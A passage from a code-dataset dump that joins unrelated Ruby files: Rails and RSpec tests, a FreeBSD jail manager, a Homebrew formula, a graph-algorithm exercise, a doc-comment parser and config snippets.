# Register the pikchr processors with Asciidoctor so that `pikchr`
# listing blocks and block macros are rendered as diagrams.
Asciidoctor::Extensions.register do
block Asciidoctor::Diagram::PikchrBlockProcessor, :pikchr
block_macro Asciidoctor::Diagram::PikchrBlockMacroProcessor, :pikchr
end
| 30.125 | 70 | 0.838174 |
084d7bae58b573cd9d99544d3f7632dbd9d39844 | 4,593 | require 'spec_helper'
require 'features/page_objects/notification'
# Feature spec: bulk-editing work packages via the Rails (non-Angular) view,
# covering both table and card layouts, with and without permission.
describe 'Bulk update work packages through Rails view', js: true do
# Roles: `dev_role` can only view; `mover_role` can copy/move/bulk-edit.
let(:dev_role) do
FactoryBot.create :role,
permissions: %i[view_work_packages]
end
let(:mover_role) do
FactoryBot.create :role,
permissions: %i[view_work_packages copy_work_packages move_work_packages manage_subtasks add_work_packages]
end
let(:dev) do
FactoryBot.create :user,
firstname: 'Dev',
lastname: 'Guy',
member_in_project: project,
member_through_role: dev_role
end
let(:mover) do
FactoryBot.create :admin,
firstname: 'Manager',
lastname: 'Guy',
member_in_project: project,
member_through_role: mover_role
end
let(:type) { FactoryBot.create :type, name: 'Bug' }
let!(:project) { FactoryBot.create(:project, name: 'Source', types: [type]) }
let!(:status) { FactoryBot.create :status }
# Two work packages sharing the same status, so the bulk status change
# below can be asserted on both.
let!(:work_package) do
FactoryBot.create(:work_package,
author: dev,
status: status,
project: project,
type: type)
end
let!(:work_package2) do
FactoryBot.create(:work_package,
author: dev,
status: status,
project: project,
type: type)
end
let!(:status2) { FactoryBot.create :default_status }
# Workflow permitting the status -> status2 transition for mover_role.
let!(:workflow) do
FactoryBot.create :workflow,
type_id: type.id,
old_status: work_package.status,
new_status: status2,
role: mover_role
end
let(:wp_table) { ::Pages::WorkPackagesTable.new(project) }
let(:context_menu) { Components::WorkPackages::ContextMenu.new }
let(:display_representation) { ::Components::WorkPackages::DisplayRepresentation.new }
before do
login_as current_user
wp_table.visit!
expect_angular_frontend_initialized
wp_table.expect_work_package_listed work_package, work_package2
# Select all work packages
find('body').send_keys [:control, 'a']
end
describe 'copying work packages' do
context 'with permission' do
let(:current_user) { mover }
before do
context_menu.open_for work_package
context_menu.choose 'Bulk edit'
# On work packages edit page
expect(page).to have_selector('#work_package_status_id')
select status2.name, from: 'work_package_status_id'
end
it 'sets two statuses' do
click_on 'Submit'
expect_angular_frontend_initialized
wp_table.expect_work_package_count 2
# Should update the status
work_package2.reload
work_package.reload
expect(work_package.status_id).to eq(status2.id)
expect(work_package2.status_id).to eq(status2.id)
end
context 'when making an error in the form' do
it 'does not update the work packages' do
# Invalid date triggers a validation failure for the whole bulk edit.
fill_in 'work_package_start_date', with: '123'
click_on 'Submit'
expect(page).to have_selector('.notification-box', text: I18n.t('work_packages.bulk.could_not_be_saved'))
expect(page).to have_selector('.notification-box', text: work_package.id)
expect(page).to have_selector('.notification-box', text: work_package2.id)
# Should not update the status
work_package2.reload
work_package.reload
expect(work_package.status_id).to eq(status.id)
expect(work_package2.status_id).to eq(status.id)
end
end
end
context 'without permission' do
let(:current_user) { dev }
it 'does not allow to copy' do
context_menu.open_for work_package
context_menu.expect_no_options 'Bulk edit'
end
end
end
describe 'accessing the bulk edit from the card view' do
before do
display_representation.switch_to_card_layout
loading_indicator_saveguard
end
context 'with permissions' do
let(:current_user) { mover }
it 'does allow to edit' do
context_menu.open_for work_package
context_menu.expect_options ['Bulk edit']
end
end
context 'without permission' do
let(:current_user) { dev }
it 'does not allow to edit' do
context_menu.open_for work_package
context_menu.expect_no_options ['Bulk edit']
end
end
end
end
| 30.417219 | 129 | 0.620509 |
18c1cc0a8a7203d6be4826960c825a66d1b785c4 | 4,833 | #
# Copyright (c) 2015 Mark Heily <[email protected]>
#
# Permission to use, copy, modify, and distribute this software for any
# purpose with or without fee is hereby granted, provided that the above
# copyright notice and this permission notice appear in all copies.
#
# THE SOFTWARE IS PROVIDED "AS IS" AND THE AUTHOR DISCLAIMS ALL WARRANTIES
# WITH REGARD TO THIS SOFTWARE INCLUDING ALL IMPLIED WARRANTIES OF
# MERCHANTABILITY AND FITNESS. IN NO EVENT SHALL THE AUTHOR BE LIABLE FOR
# ANY SPECIAL, DIRECT, INDIRECT, OR CONSEQUENTIAL DAMAGES OR ANY DAMAGES
# WHATSOEVER RESULTING FROM LOSS OF USE, DATA OR PROFITS, WHETHER IN AN
# ACTION OF CONTRACT, NEGLIGENCE OR OTHER TORTIOUS ACTION, ARISING OUT OF
# OR IN CONNECTION WITH THE USE OR PERFORMANCE OF THIS SOFTWARE.
#
# Factory class to produce objects that interact with OS-specific
# container functionality.
#
# Examples:
# * FreeBSD jails
# * Linux LXC containers
# * Solaris zones
#
# Factory for OS-specific container backends (jails, LXC, zones, ...).
class Launch::Container
  # Builds the container implementation matching the host platform.
  # The 'null' platform is a stand-in that runs everything on the host.
  def self.new(name, plist)
    os = Gem::Platform.local.os
    if os == 'freebsd'
      Launch::Container::EzJail.new(name, plist)
    elsif os == 'null'
      Launch::Container::Null.new(name, plist)
    elsif os == 'linux'
      raise 'TODO - LXC containers'
    else
      raise 'unsupported OS: ' + os
    end
  end
end
# A common base class for all container types
class Launch::Container::Base
attr_reader :name, :chroot
def initialize(name, plist)
@name = name
@logger = Launch::Log.instance.logger
@plist = plist
end
protected
# Where to send log output from shell commands
def shell_logfile
ENV['DEBUG'] ? '' : '>/dev/null 2>&1'
end
end
# A "null container" that executes everything in the host OS
class Launch::Container::Null < Launch::Container::Base
def initialize(name, plist)
super(name, plist)
@chroot = '/'
end
def exists?
true
end
def running?
true
end
def create
self
end
def start
self
end
def stop
self
end
def destroy
nil
end
def spawn(args)
Process.spawn(*args, :close_others => false)
end
def package_manager
Launch::PackageManager.new
end
end
# Use the ezjail-admin tool to manage FreeBSD jails
class Launch::Container::EzJail < Launch::Container::Base
def initialize(name, plist)
super(name, plist)
@chroot = "/usr/jails/#{name}"
@pkgtool = Launch::PackageManager.new(container: @name)
end
def exists?
File.exist? chroot
end
def running?
jails = `jls -N | awk '{ print $1 }'`.split /\n/
jails.include? sanitized_name
end
def create
# XXX-FIXME need to autodetect the next available loopback IP
cmd = "ezjail-admin create #{name} 'lo1|127.0.1.1'"
@logger.debug "creating jail: #{cmd}"
# XXX-FIXME seems to return non-zero if there are warnings
system "#{cmd} #{shell_logfile}" # or raise "command failed: #{cmd}"
raise 'creation failed' unless exists?
Launch::Firewall.new.enable_nat('127.0.1.1') #XXX-FIXME hardcoded
start
system "cp /etc/resolv.conf /usr/jails/#{name}/etc" or raise "cp failed"
# Install required packages
@pkgtool.chroot = chroot
@pkgtool.jail_id = jail_id
@pkgtool.setup
@plist.packages.each do |package|
@pkgtool.install(package) unless @pkgtool.installed?(package)
end
# Run the post-create commands
@plist.post_create_commands.each do |cmd|
cmd.gsub!('$chroot', chroot)
@logger.debug "running post-create command: #{cmd}"
system cmd
# TODO: log and warn on a non-zero exit status
end
end
def start
cmd = "ezjail-admin start #{name} #{shell_logfile}"
@logger.debug "starting jail: #{cmd}"
system cmd
raise 'startup action failed' unless running?
@logger.debug "jail started; jid=#{jail_id}"
end
def stop
cmd = "ezjail-admin stop #{name} #{shell_logfile}"
@logger.debug "stopping jail: #{cmd}"
system cmd
raise 'stop action failed' if running?
end
def destroy
cmd = "ezjail-admin delete -wf #{name} #{shell_logfile}"
system cmd or raise "command failed: #{cmd}"
end
def spawn(args)
@logger.debug "hello"
cmd = ['jexec', jail_id].concat(args)
@logger.debug "spawning: #{cmd.inspect}"
Process.spawn(*cmd, :close_others => false)
end
def package_manager
@pkgtool
end
private
# ezjail sanitizes the name, so we need this name
def sanitized_name
@name.gsub(/\./, '_')
end
# The numeric jail ID of the jail
def jail_id
`jls -n`.split(/\n/).each do |line|
tok = line.split(/ /)
rec = {}
tok.each { |t| key, val = t.split(/=/) ; rec[key] = val }
#@logger.debug rec.inspect
if rec['host.hostname'] == @name
return rec['jid']
end
end
raise "jail not found"
end
end
| 23.925743 | 76 | 0.663149 |
# NOTE(review): the name reads like a Rails migration ("AddStatusToTask"),
# but the class inherits ApplicationRecord, i.e. it is an ActiveRecord
# model — confirm this is intentional and not a mis-generated migration.
class AddStatusToTask < ApplicationRecord
end
| 15.333333 | 41 | 0.869565 |
# Homebrew formula for SPIRV-Cross (SPIR-V reflection/disassembly tool).
class SpirvCross < Formula
desc "Performing reflection and disassembling SPIR-V"
homepage "https://github.com/KhronosGroup/SPIRV-Cross"
url "https://github.com/KhronosGroup/SPIRV-Cross/archive/2021-01-15.tar.gz"
version "2021-01-15"
sha256 "d700863b548cbc7f27a678cee305f561669a126eb2cc11d36a7023dfc462b9c4"
license "Apache-2.0"
bottle do
sha256 cellar: :any_skip_relocation, arm64_big_sur: "80a4ee152f875a3b653457ee40e0a05fa9892cc6203fd3d525e16157e646c3c0"
sha256 cellar: :any_skip_relocation, big_sur: "224f4a1ac8dbc055a8ea1a431a82e275a3de850f805d7aa5388d05696616e403"
sha256 cellar: :any_skip_relocation, catalina: "612183441f7920e7f6a3f4d87181e30ecc071a3d2d20185c8b3d614dc2deb30b"
sha256 cellar: :any_skip_relocation, mojave: "df9e5893b35edc958ae73b9e763ff63e35d5e8438f9e67cc332ec14ce00f6def"
sha256 cellar: :any_skip_relocation, x86_64_linux: "aabda622a0d771c74d290a183ca7bee86642b018204e17a40cc8d21a70e1af64" # linuxbrew-core
end
depends_on "cmake" => :build
depends_on "glm" => :test
depends_on "glslang" => :test
# Standard out-of-source CMake build; samples and headers are kept so the
# test block below can compile against the installed copy.
def install
mkdir "build" do
system "cmake", "..", *std_cmake_args
system "make", "install"
end
# required for tests
prefix.install "samples"
(include/"spirv_cross").install Dir["include/spirv_cross/*"]
end
# Builds the bundled C++ sample against the installed headers/library.
test do
cp_r Dir[prefix/"samples/cpp/*"], testpath
inreplace "Makefile", "-I../../include", "-I#{include}"
inreplace "Makefile", "../../spirv-cross", "spirv-cross"
system "make"
end
end
| 39.358974 | 139 | 0.747883 |
ac9982c00e64ea695c0e74beea5f4cdd043a258e | 904 | # frozen_string_literal: true
# Auto-generated file
# DO NOT EDIT
require 'spec_helper'
RSpec.describe Cryptopay::Rates do
  include_context :api

  describe '#all' do
    # HTTP traffic replayed from the VCR cassette at api/rates/all.
    it 'returns RatesResult', :aggregate_failures, vcr: 'api/rates/all' do
      result = client.rates.all

      p result # => <RatesResult data=...>

      expect(result).to be_a(Cryptopay::RatesResult)
      expect(result).to be_valid
      expect(result.invalid_properties).to be_empty
    end
  end

  describe '#retrieve' do
    # HTTP traffic replayed from the VCR cassette at api/rates/retrieve.
    it 'returns RateResult', :aggregate_failures, vcr: 'api/rates/retrieve' do
      base_currency = 'BTC'
      quote_currency = 'EUR'

      result = client.rates.retrieve(base_currency, quote_currency)

      p result # => <RateResult data=...>

      expect(result).to be_a(Cryptopay::RateResult)
      expect(result).to be_valid
      expect(result.invalid_properties).to be_empty
    end
  end
end
| 25.111111 | 78 | 0.686947 |
abff544f2c2d7ee865ca90a9feecc83e5eb51ffe | 47 | module Valkyrie
  # Empty namespace placeholder — presumably the gem's root module
  # (as generated by `bundle gem`); implementation lives elsewhere.
  # Your code goes here...
end
| 11.75 | 26 | 0.702128 |
6165f5b36982e60681d96b53d3a583bf091d11a9 | 5,047 | require 'test_helper'
# ServiceStore.determine_services
#
# Loads service definitions into a Collection object, based on services configuration
# and current umlaut.service_group param. Tests.
# Tests for ServiceStore#determine_services: which service definitions are
# active given the configured groups and the umlaut.service_group param.
#
# Fixes in this revision:
# * Restored the "umlaut.service_group" parameter name that had been
#   mangled by HTML-entity decoding ("&uml" -> "¨", leaving "¨aut.").
# * Fixed the misspelled local `service_declerations`.
class DetermineServicesTest < ActiveSupport::TestCase
  setup :set_custom_service_store

  def set_custom_service_store
    dummy = {"type" => "DummyService", "priority" => 3}
    # This would normally be loaded as YAML, we're going to set it
    # directly.
    service_declarations = {
      "default" => {
        "services" => {
          "default_a" => dummy.clone,
          "default_b" => dummy.clone,
          "default_disabled" => dummy.clone.merge("disabled" => true)
        }
      },
      "group1" => {
        "services" => {
          "group1_a" => dummy.clone,
          "group1_b" => dummy.clone,
          "group1_disabled" => dummy.clone.merge("disabled" => true)
        }
      },
      "group2" => {
        "services" => {
          "group2_a" => dummy.clone,
          "group2_b" => dummy.clone,
          "group2_disabled" => dummy.clone.merge("disabled" => true)
        }
      }
    }

    @service_store = ServiceStore.new
    @service_store.config = service_declarations
  end

  def test_basic
    service_list = @service_store.determine_services

    # default group services
    assert service_list.keys.include? "default_a"
    assert service_list.keys.include? "default_b"

    # but not the disabled one
    refute service_list.keys.include? "default_disabled"

    # No group1 or group2
    assert_nil service_list.keys.find {|key| key.start_with? "group1"}
    assert_nil service_list.keys.find {|key| key.start_with? "group2"}
  end

  def test_add_groups
    service_list = @service_store.determine_services %w[group2 group1]

    ["default_a", "default_b", "group1_a", "group1_b", "group2_a", "group2_b"].each do |service_id|
      assert service_list.keys.include? service_id
    end

    ["default_disabled", "group1_disabled", "group2_disabled"].each do |service_id|
      refute service_list.keys.include? service_id
    end
  end

  def test_add_group_no_default
    service_list = @service_store.determine_services %w{group1 -default}

    # does not include default ones
    assert_nil service_list.keys.find {|id| id.start_with? "default_"}

    # does include group1 ones
    assert service_list.keys.include? "group1_a"
    assert service_list.keys.include? "group1_b"
  end

  # Should this raise a clear error instead? For now, we ignore.
  def test_missing_service_group_ignored
    # Must not raise; unknown groups are silently ignored.
    @service_store.determine_services %w{non_existing_group}
  end

  def test_multi_default_groups
    store = multi_default_group_store
    service_list = store.determine_services

    assert service_list.keys.include? "default_a"
    assert service_list.keys.include? "other_default_a"
  end

  def test_multi_default_disable
    store = multi_default_group_store
    service_list = store.determine_services %w{-other_default}

    assert service_list.keys.include? "default_a"
    refute service_list.keys.include? "other_default_a"
  end

  # A terrible way and place to test this, but our legacy code is tricky, currently
  # consider this better than nothing.
  #
  # the Request.co_params_fingerprint must take account of new "umlaut.service_group", to make sure
  # a cached request same but for different umlaut.service_group is NOT re-used
  def test_params_fingerprint_includes_service_group
    req_string = "/?issn=12345678&"

    req     = ActionDispatch::TestRequest.new Rack::MockRequest.env_for(req_string)
    req_sg1 = ActionDispatch::TestRequest.new Rack::MockRequest.env_for(req_string + "umlaut.service_group[]=group1")
    req_sg2 = ActionDispatch::TestRequest.new Rack::MockRequest.env_for(req_string + "umlaut.service_group[]=groupother")

    fingerprint     = Request.co_params_fingerprint( Request.context_object_params req )
    fingerprint_sg1 = Request.co_params_fingerprint( Request.context_object_params req_sg1 )
    fingerprint_sg2 = Request.co_params_fingerprint( Request.context_object_params req_sg2 )

    assert_not_equal fingerprint, fingerprint_sg1
    assert_not_equal fingerprint, fingerprint_sg2
    assert_not_equal fingerprint_sg1, fingerprint_sg2
  end

  # A store with TWO default groups: the implicit "default" plus one marked
  # "default" => true, and one extra opt-in group.
  def multi_default_group_store
    dummy = {"type" => "DummyService", "priority" => 3}
    service_declarations = {
      "default" => {
        "services" => {
          "default_a" => dummy.clone,
          "default_b" => dummy.clone,
          "default_disabled" => dummy.clone.merge("disabled" => true)
        }
      },
      "other_default" => {
        "default" => true,
        "services" => {
          "other_default_a" => dummy.clone
        }
      },
      "extra_group" => {
        "services" => {
          "extra_group_a" => dummy.clone,
        }
      }
    }
    store = ServiceStore.new
    store.config = service_declarations
    return store
  end
end
| 30.77439 | 122 | 0.671884 |
# Floyd-Warshall all-pairs shortest distances.
# matrix_w: square weight matrix (Float::INFINITY where there is no edge).
# Returns a fresh distance matrix; matrix_w is left untouched.
def floyd(matrix_w)
  n = matrix_w.size - 1
  matrix_d = matrix_w.map(&:clone)
  (0..n).each do |k|
    (0..n).each do |i|
      (0..n).each do |j|
        through_k = matrix_d[i][k] + matrix_d[k][j]
        matrix_d[i][j] = through_k if through_k < matrix_d[i][j]
      end
    end
  end
  matrix_d
end
# Floyd-Warshall with path reconstruction.
# Returns the predecessor matrix P where P[i][j] is the (1-based) highest
# intermediate vertex on a shortest i->j path, or 0 when the direct edge
# is already optimal.
def floyd2(matrix_w)
  n = matrix_w.size - 1
  matrix_p = Array.new(n + 1) { Array.new(n + 1, 0) }
  matrix_d = matrix_w.map(&:clone)
  (0..n).each do |k|
    (0..n).each do |i|
      (0..n).each do |j|
        detour = matrix_d[i][k] + matrix_d[k][j]
        next unless detour < matrix_d[i][j]
        matrix_p[i][j] = k + 1
        matrix_d[i][j] = detour
      end
    end
  end
  matrix_p
end
# Print the intermediate vertices on the shortest q->r path (in order),
# using the global predecessor matrix $P produced by floyd2.
# Vertex numbers are 1-based; prints nothing for a direct edge.
def path(q, r)
  via = $P[q - 1][r - 1]
  return if via == 0
  path(q, via)
  puts "v#{via}"
  path(via, r)
end
# Demo: 5-vertex directed graph from the textbook example.
infinite = Float::INFINITY
adjacency_matrix = [[0, 1, infinite, 1, 5], [9, 0, 3, 2, infinite], [infinite, infinite, 0, 4, infinite], [infinite, infinite, 2, 0, 3], [3, infinite, infinite, infinite, 0]]
# Print the all-pairs distance and predecessor matrices.
p floyd(adjacency_matrix)
p floyd2(adjacency_matrix)
# Expected predecessor matrix for the graph above; path(5, 3) prints the
# intermediate vertices of the shortest v5 -> v3 route.
$P = [[0, 0, 4, 0, 4], [5, 0, 0, 0, 4], [5, 5, 0, 0, 4], [5, 5, 0, 0, 0], [0, 1, 4, 1, 0]]
path(5, 3)
| 23.730769 | 174 | 0.515397 |
bb79f419fef51ee2ec6408aae5c97e0c45d6cbc6 | 10,152 |
require 'parse/doccomment_parser'
class CommentData
def initialize
@blocks = []
end
def add_block(block)
@blocks << block
end
def each_block
@blocks.each do |block|
yield block
end
end
def [](i)
@blocks[i]
end
def each_block_of_type(type)
each_block do |block|
yield block if block.is_a?(type)
end
end
def has_blocktype?(type)
each_block_of_type(type) do |block|
return true
end
return false
end
def has_params?
has_blocktype?(ParamBlockTag)
end
def has_exceptions?
has_blocktype?(ThrowsBlockTag)
end
def has_seealso?
has_blocktype?(SeeBlockTag)
end
def has_return?
has_blocktype?(ReturnBlockTag)
end
# Does the method comment include any info in addition to any basic
# description block?
def has_method_additional_info?
has_params? || has_return? || has_exceptions? || has_seealso?
end
# Does the field comment include any info in addition to any basic description
# block?
def has_field_additional_info?
has_seealso?
end
def each_exception
each_block_of_type(ThrowsBlockTag) {|block| yield block }
end
def each_seealso
each_block_of_type(SeeBlockTag) {|block| yield block }
end
def find_param(param_match)
each_block_of_type(ParamBlockTag) do |block|
return block if param_match === block.param_name
end
return nil
end
def find_return
each_block_of_type(ReturnBlockTag) do |block|
return block
end
return nil
end
end
# Receives parse events from the doc-comment parser and assembles a
# CommentData, delegating text to the active block handler (or to the
# active inline handler when inside an {@tag ...}).
class OurDocCommentHandler < ActionScript::ParseDoc::DocCommentHandler
  def initialize(comment_data, handler_config, type_resolver)
    @comment_data = comment_data
    @handler_config = handler_config
    @type_resolver = type_resolver
  end

  # A comment always starts in the description block (before any @tag).
  def comment_start(lineno)
    @block_handler = @handler_config.initial_block_handler
    @inline_handler = nil
    beginning_of_block(lineno)
  end

  def comment_end
    end_of_block
  end

  # Plain text goes to the inline handler when one is open, otherwise to
  # the current block handler.
  def text(text)
    if @inline_handler
      @inline_handler.text(text)
    else
      @block_handler.text(text)
    end
  end

  # An @tag paragraph closes the current block and opens the handler
  # registered for that tag name.
  def start_paragraph_tag(tag)
    end_of_block
    @block_handler = @handler_config.handler_for(tag)
    beginning_of_block(tag.lineno)
  end

  def start_inline_tag(tag)
    @inline_handler = @block_handler.handler_for(tag)
    @inline_handler.start(@type_resolver, tag.lineno)
  end

  # Close the inline tag; its result (if any) is appended to the block.
  def end_inline_tag
    tag = @inline_handler.end
    @block_handler.add_inline(tag) if tag
    @inline_handler = nil
  end

  private

  def beginning_of_block(lineno)
    @block_handler.begin_block(@type_resolver, lineno)
  end

  # Handlers may return nil (e.g. a malformed @throws); skip those.
  def end_of_block
    block = @block_handler.end_block
    @comment_data.add_block(block) unless block.nil?
  end
end
# Maps paragraph tag names ("param", "see", ...) to block parsers.
class DocCommentParserConfig
  # Handler used for the leading description text (before any @tag).
  attr_accessor :initial_block_handler

  def initialize
    @initial_block_handler = nil
    @block_handlers = {}
  end

  # Register +handler+ for @+name+ paragraphs and point it back at this
  # config.
  def add_block_parser(name, handler)
    @block_handlers[name] = handler
    handler.handler = self
  end

  # Parser for the given tag; unknown tags are reported and swallowed by
  # NIL_HANDLER.
  def handler_for(kind)
    found = @block_handlers[kind.body]
    return found if found

    parse_error("#{kind.source}:#{kind.lineno}: Unknown block tag @#{kind.body}")
    NIL_HANDLER
  end

  private

  def parse_error(msg)
    $stderr.puts(msg)
  end
end
# Base class for parsed inline tags; records the source line number.
# Two tags compare equal when they originate from the same line.
class Tag
  attr_accessor :lineno

  def initialize(lineno)
    @lineno = lineno
  end

  def ==(other)
    lineno == other.lineno
  end
end

# Result of an {@link target#member text} inline tag.
class LinkTag < Tag
  attr_accessor :target, :member, :text

  def initialize(lineno, target, member, text)
    super(lineno)
    @target = target
    @member = member
    @text = text
  end

  def ==(other)
    super(other) && member == other.member && text == other.text && target == other.target
  end
end

# Result of a {@code text} inline tag.
class CodeTag < Tag
  attr_accessor :text

  def initialize(lineno, text)
    super(lineno)
    @text = text
  end
end
# One block-level tag's content: an ordered list of inline elements
# (strings interleaved with inline Tag objects).
class BlockTag
  def initialize
    @inlines = []
  end

  # Append an inline; consecutive strings are merged into one.
  def add_inline(inline)
    previous = @inlines.last
    if inline.is_a?(String) && previous.is_a?(String)
      previous << inline
    else
      @inlines << inline
    end
  end

  def each_inline(&visitor)
    @inlines.each(&visitor)
  end

  def inlines
    @inlines
  end

  def ==(other)
    other.respond_to?(:inlines) && inlines == other.inlines
  end
end

# "@param name description" block.
class ParamBlockTag < BlockTag
  attr_accessor :param_name

  def ==(other)
    super(other) && param_name == other.param_name
  end
end

# "@throws Type description" block.
class ThrowsBlockTag < BlockTag
  attr_accessor :exception_type
end

# "@see ..." block.
class SeeBlockTag < BlockTag
end

# "@return description" block.
class ReturnBlockTag < BlockTag
end
# Accumulates the body text of one inline tag ({@link ...}, {@code ...}).
# Subclasses implement #end and read @type_resolver/@lineno/@text.
class InlineParser
  def start(type_resolver, lineno)
    @type_resolver = type_resolver
    @lineno = lineno
    @text = String.new
  end

  def text(text)
    @text = @text + text.to_s
  end
end
# creates a LinkTag inline
# Splits "Type#member trailing text" into a resolved type proxy, member
# name and text. Returns nil when +text+ has no leading target token
# (including when +text+ is nil — Object#=~ tolerates nil).
def create_link(type_resolver, text, lineno)
  return nil unless text =~ /^\s*([^\s]+(?:\([^\)]*\))?)\s*/
  head = Regexp.last_match
  target = head[1]
  remainder = head.post_match

  # TODO: need a MemberProxy (and maybe Method+Field subclasses) with similar
  # role to TypeProxy, to simplify this, and output_doccomment_inlinetag
  split = target.match(/([^#]*)#(.*)/)
  if split
    type_name = split[1]
    member_name = split[2]
  else
    type_name = target
    member_name = nil
  end

  # A bare "#member" target refers to the current type.
  type_proxy = type_name == "" ? nil : type_resolver.resolve(type_name, lineno)
  LinkTag.new(lineno, type_proxy, member_name, remainder)
end
# handle {@link ...} in comments
class LinkInlineParser < InlineParser
  # Produce a LinkTag, or fall back to the literal tag text when the
  # target cannot be parsed.
  def end
    create_link(@type_resolver, @text, @lineno) || "{@link #{@text}}"
  end
end
# handle {@code ...} in comments
class CodeInlineParser < InlineParser
  # Wrap the accumulated text in a CodeTag.
  def end
    CodeTag.new(@lineno, @text)
  end
end
# Base class for paragraph-level tag parsers (@param, @see, ...).
# Subclasses assign @data in begin_block and may post-process it in
# end_block.
class BlockParser
  # Back-reference to the owning DocCommentParserConfig.
  attr_accessor :handler

  def initialize
    @inline_parsers = {}
    @data = nil
  end

  def begin_block(type_resolver, lineno)
    @type_resolver = type_resolver
    @lineno = lineno
  end

  # The finished block tag, or nil when nothing was collected.
  def end_block
    @data
  end

  def add_inline_parser(tag_name, parser)
    @inline_parsers[tag_name] = parser
  end

  # Inline-tag parser for +tag+; unknown tags are reported on stderr and
  # swallowed by NIL_INLINE_PARSER.
  def handler_for(tag)
    found = @inline_parsers[tag.body]
    return found if found

    $stderr.puts("#{tag.lineno}: Unknown inline tag #{tag.body.inspect} for #{self.class.name}")
    NIL_INLINE_PARSER
  end

  def text(text)
    add_text(text.to_s)
  end

  def add_inline(tag)
    @data.add_inline(tag)
  end

  def add_text(text)
    raise "#{self.class.name} has no @data" unless @data
    @data.add_inline(text)
  end
end
# Swallows everything; installed when an unknown block tag is seen.
class NilBlockParser < BlockParser
  # Discard text silently.
  def add_text(text)
  end

  # Unknown blocks also swallow their inline tags.
  def handler_for(tag)
    NIL_INLINE_PARSER
  end
end

NIL_HANDLER = NilBlockParser.new
# Inline parser that produces nothing (used for unknown inline tags).
class NilInlineParser < InlineParser
  def end
    nil
  end
end

NIL_INLINE_PARSER = NilInlineParser.new
# Parses "@param name description..." paragraphs.
class ParamParser < BlockParser
  def begin_block(type_resolver, lineno)
    super(type_resolver, lineno)
    @data = ParamBlockTag.new
  end

  # Split the leading word off the first inline as the parameter name;
  # the remainder stays as the description.
  def end_block
    if @data.inlines[0] =~ /\s*([^\s]+)\s+/
      head = Regexp.last_match
      @data.param_name = head[1]
      @data.inlines[0] = head.post_match
    end
    @data
  end
end
# Parses "@throws Type description..." paragraphs.
class ThrowsParser < BlockParser
  def begin_block(type_resolver, lineno)
    super(type_resolver, lineno)
    @data = ThrowsBlockTag.new
  end

  # Resolve the leading word as the exception type; returns nil (block
  # dropped) when no type token is present.
  def end_block
    return nil unless @data.inlines[0] =~ /\A\s*([^\s]+)\s+/
    head = Regexp.last_match
    @data.inlines[0] = head.post_match
    @data.exception_type = @type_resolver.resolve(head[1])
    @data
  end
end
# Collects the body of an "@return ..." paragraph.
class ReturnParser < BlockParser
  def begin_block(type_resolver, lineno)
    super(type_resolver, lineno)
    @data = ReturnBlockTag.new
  end
end
# Collects the free-form description text at the start of a comment.
class DescriptionParser < BlockParser
  def begin_block(type_resolver, lineno)
    super(type_resolver, lineno)
    @data = BlockTag.new
  end
end
# Parses "@see ..." paragraphs. The first inline decides the form:
# quoted string, raw HTML, or a link target.
class SeeParser < BlockParser
  def begin_block(type_resolver, lineno)
    super(type_resolver, lineno)
    @data = SeeBlockTag.new
  end

  def end_block
    @data.inlines.first =~ /\A\s*/
    body = $'
    case body
    when /['"]/
      # plain, 'string'-like see entry
    when /</
      # HTML entry
    else
      # 'link' entry
      link = create_link(@type_resolver, @data.inlines.first, @lineno)
      @data.inlines[0] = link unless link.nil?
    end
    @data
  end
end
#############################################################################
# Assembles DocCommentParserConfig instances for the three doc-comment
# contexts (methods, fields, types).
class ConfigBuilder
  # Method comments additionally understand @param/@return/@throws/@exception.
  def build_method_config
    config = build_config
    add_standard_block_parsers(config)
    config.add_block_parser("param", build_param_block_parser)
    config.add_block_parser("return", build_return_block_parser)
    config.add_block_parser("throws", build_throws_block_parser)
    config.add_block_parser("exception", build_throws_block_parser)
    config
  end

  # Field comments only get the standard description/@see handling.
  def build_field_config
    config = build_config
    add_standard_block_parsers(config)
    config
  end

  # Type comments additionally swallow @author.
  def build_type_config
    config = build_config
    add_standard_block_parsers(config)
    config.add_block_parser("author", build_author_block_parser)
    config
  end

  protected

  def build_config
    DocCommentParserConfig.new
  end

  def add_standard_block_parsers(config)
    config.initial_block_handler = build_description_block_parser
    config.add_block_parser("see", build_see_block_parser)
  end

  # Every block parser understands {@link} and {@code}.
  def add_common_inlines(block_parser)
    block_parser.add_inline_parser("link", LinkInlineParser.new)
    block_parser.add_inline_parser("code", CodeInlineParser.new)
  end

  def build_description_block_parser
    DescriptionParser.new.tap { |parser| add_common_inlines(parser) }
  end

  def build_param_block_parser
    ParamParser.new.tap { |parser| add_common_inlines(parser) }
  end

  def build_return_block_parser
    ReturnParser.new.tap { |parser| add_common_inlines(parser) }
  end

  def build_throws_block_parser
    ThrowsParser.new.tap { |parser| add_common_inlines(parser) }
  end

  def build_see_block_parser
    SeeParser.new.tap { |parser| add_common_inlines(parser) }
  end

  def build_author_block_parser
    NilBlockParser.new # ignore @author tags
  end
end
# vim:softtabstop=2:shiftwidth=2
| 19.046904 | 98 | 0.687352 |
d5d8628bfbf59918eaf1f3976fbcb6ae064793e2 | 1,030 | require 'test_helper'
class TagsControllerTest < ActionController::TestCase
setup do
@tag = tags(:one)
end
test "should get index" do
get :index
assert_response :success
assert_not_nil assigns(:tags)
end
test "should get new" do
get :new
assert_response :success
end
test "should create tag" do
assert_difference('Tag.count') do
post :create, tag: { convention_id: @tag.convention_id, name: @tag.name }
end
assert_redirected_to tag_path(assigns(:tag))
end
test "should show tag" do
get :show, id: @tag
assert_response :success
end
test "should get edit" do
get :edit, id: @tag
assert_response :success
end
test "should update tag" do
patch :update, id: @tag, tag: { convention_id: @tag.convention_id, name: @tag.name }
assert_redirected_to tag_path(assigns(:tag))
end
test "should destroy tag" do
assert_difference('Tag.count', -1) do
delete :destroy, id: @tag
end
assert_redirected_to tags_path
end
end
| 20.6 | 88 | 0.675728 |
acf16155f42943e5c7c747117c40415b34571bfd | 681 | # Be sure to restart your server when you modify this file.
# Version of your assets, change this if you want to expire all your assets.
Rails.application.config.assets.version = "1.0"

# Add additional assets to the asset load path
# Rails.application.config.assets.paths << Emoji.images_path

# Precompile additional assets.
# application.js, application.css, and all non-JS/CSS in app/assets folder are already added.
Rails.application.config.assets.precompile += [
  "admin/login.css",
]

# Move default assets directory so this project can co-exist with the
# static-site project that delivers most of the web content.
Rails.application.config.assets.prefix = "/web-assets"
0317f9162ccf3efa8d81cce8cb260f687a9c7dd7 | 5,336 | # frozen_string_literal: true
require 'spec_helper'
RSpec.describe 'Group empty states' do
let(:group) { create(:group) }
